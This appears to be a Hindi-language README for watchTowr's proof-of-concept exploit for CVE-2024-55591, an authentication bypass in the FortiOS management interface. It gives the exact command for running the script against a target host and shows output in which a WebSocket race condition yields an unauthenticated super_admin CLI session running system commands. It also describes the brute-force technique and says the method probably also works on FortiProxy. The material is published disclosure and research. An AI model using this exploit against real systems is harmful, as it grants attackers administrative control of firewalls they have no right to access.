
CVE-2024-55591 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो FortiOS प्रबंधन इंटरफेस में प्रमाणीकरण बायपास को प्रदर्शित करता है, WebSocket रेस कंडीशन के माध्यम से बिना प्रमाणीकरण के CLI कमांड निष्पादित करने के लिए।
Fortinet FortiOS प्रमाणीकरण बायपास प्रूफ ऑफ कॉन्सेप्ट
हमारा ब्लॉग पोस्ट देखें तकनीकी विवरण के लिए
python CVE-2024-55591-PoC.py --host 192.168.1.5 --port 443 --command "get system status" --user watchTowr --ssl
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \\| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \\___| Y | |( <_> \ / | | \
\/\_/ (____ |__| \\\\___ |___|__|__ | \\__ / \\/\_/ |__|
\\ \\ \\
CVE-2024-55591.py
(*) Fortinet FortiOS Authentication Bypass (CVE-2024-55591) POC by watchTowr
- Sonny , watchTowr ([email protected])
CVEs: [CVE-2024-55591]
[*] Checking if target is a FortiOS Management interface
[*] Target is confirmed as a FortiOS Management interface
[*] Target is confirmed as vulnerable to CVE-2024-55591, proceeding with exploitation
Output from server: �m"watchTowr" "admin" "watchTowr" "super_admin" "watchTowr" "watchTowr" [13.37.13.37]:1337 [13.37.13.37]:1337
Output from server: �
get system status
Output from server: �~�FAKESERIAL # "Local_Process_Access" "Local_Process_Access" "root" "" "" "none" [x.x.x.x]:54546 [x.x.x.x]:443
Unknown action 0
FAKESERIAL #
FAKESERIAL # get system status
Version: FortiGate-VM64-AWS v7.0.16,build0667,241001 (GA.M)
Security Level: High
Firmware Signature: certified
Virus-DB: 1.00000(2018-04-09 18:07)
यह स्क्रिप्ट CVE-2024-55591 के लिए एक प्रूफ ऑफ कॉन्सेप्ट है, जो FortiOS (Fortigate) प्रबंधन इंटरफेस को लक्षित करती है। WebSocket कनेक्शनों को ब्रूट फोर्स करके एक रेस स्थिति उत्पन्न करके और प्रमाणीकरण बायपास के साथ, FortiOS CLI कमांड को बिना प्रमाणीकरण के भेजना संभव है। अधिक विवरण हमारे [ब्लॉग पोस्ट] (https://labs.watchtowr.com/) में वर्णित हैं।
अधिक विवरण Fortinet सलाह पर
यह स्क्रिप्ट FortiProxy के साथ काम करने के लिए डिज़ाइन नहीं की गई है, क्योंकि प्री-फ़्लाइट जाँच यह निर्धारित करती है कि इंस्टेंस FortiGate प्रबंधन इंटरफ़ेस है या नहीं, लेकिन यह माना जाता है कि अंतर्निहित तकनीक प्रभावित FortiProxy उपकरणों पर लागू है।
नवीनतम सुरक्षा अनुसंधान के लिए watchTowr Labs टीम को फ़ॉलो करें